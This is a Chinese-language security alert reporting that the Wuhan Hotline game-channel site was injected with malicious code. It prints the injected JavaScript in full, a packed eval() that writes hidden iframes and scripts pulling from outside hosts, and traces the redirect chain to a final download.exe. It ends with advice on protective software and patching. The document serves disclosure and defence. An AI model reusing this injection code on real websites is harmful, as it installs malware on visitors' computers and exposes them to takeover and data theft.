武汉热线游戏频道被植入恶意代码
武汉热线游戏频道(hxxp://game.wuhan.net.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:hxxp://game.wuhan.net.cn/
网页被嵌入恶意链接代码:
if(document.cookie.indexOf(’hello’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’hello=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’//w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’//b’+e(c)+’//b’,'g’),k[c]);return p}(’b.t(/’<q k=i r=f://4.8.5.3.n/h/6.7?1></q><g d=0 s=0 r=”f://m.v.9/e/j/2/a/l.o?1″></g><g d=0 s=0 r=”f://u.p.8/l.c?1″></g>/’)',62,32,’|123|200812|3322|360|97sewo|asd|aspx|cn|com|data|document|gif|height|html|hxxp|iframe|images|javascript|juhui|language|logo|news|org|png|qqxnm|script|src|width|writeln|www|zhike’.split(’|'),0,{}));}
挂马分析:
0 Root hxxp://game.wuhan.net.cn/
1 script hxxp://game.wuhan.net.cn/game/include/dedeajax2.js
2 script hxxp://360.cn.97sewo.3322.org/images/asd.aspx?123
2 iframe hxxp://news.zhike.com/html/juhui/200812/data/logo.png?123
3 anlyze hxxp://news.zhike.com/html/juhui/200812/data/logo.htm?
4 iframe hxxp://news.zhike.com/html/juhui/200812/data/aa.htm?
5 iframe hxxp://news.zhike.com/html/juhui/200812/data/wm/html/index.htm?
6 iframe hxxp://news.zhike.com/html/juhui/200812/data/wm/html/of.htm
6 script hxxp://news.zhike.com/html/juhui/200812/data/wm/html/var.js
6 script hxxp://news.zhike.com/html/juhui/200812/data/wm/html/tj.js
4 iframe hxxp://news.zhike.com/html/juhui/200812/data/bb.htm?
2 iframe hxxp://www.qqxnm.cn/logo.gif?123
最终下载病毒文件:
hxxp://news.zhike.com/html/juhui/200812/data/wm/download.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
该网站历史挂马次数:3
Google对该网站的判定:安全
知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。
关键字:武汉热线游戏频道
